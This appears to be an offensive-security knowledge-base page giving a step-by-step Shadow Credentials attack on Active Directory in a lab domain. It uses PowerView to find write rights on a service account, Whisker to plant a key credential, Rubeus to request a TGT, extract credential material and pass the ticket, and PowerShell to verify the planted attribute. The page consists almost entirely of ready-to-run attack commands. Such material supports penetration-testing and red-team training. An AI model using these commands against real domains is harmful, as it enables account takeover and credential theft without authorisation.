Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ACL Abuse / Shadow Credentials / Techniques

Windows

Check the edge with PowerView:

Import-Module .\PowerView.ps1

Get-DomainObjectAcl -Identity 'svc_web' -ResolveGUIDs |
    Where-Object { $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteProperty' }

Add key credential with Whisker:

.\Whisker.exe add /target:svc_web /domain:ootw.local /dc:OOTW-DC01.ootw.local /path:svc_web.pfx /password:PfxPass2026!

Request TGT and extract credential material with Rubeus:

.\Rubeus.exe asktgt /user:svc_web /certificate:svc_web.pfx /password:PfxPass2026! /domain:ootw.local /dc:OOTW-DC01.ootw.local /getcredentials /nowrap

Pass the ticket into the current session:

.\Rubeus.exe asktgt /user:svc_web /certificate:svc_web.pfx /password:PfxPass2026! /domain:ootw.local /dc:OOTW-DC01.ootw.local /ptt
klist

Verify the attribute:

Get-ADUser svc_web -Properties msDS-KeyCredentialLink |
    Select-Object -ExpandProperty msDS-KeyCredentialLink

Get-DomainObject -Identity svc_web -Properties msDS-KeyCredentialLink |
    Select-Object -ExpandProperty msDS-KeyCredentialLink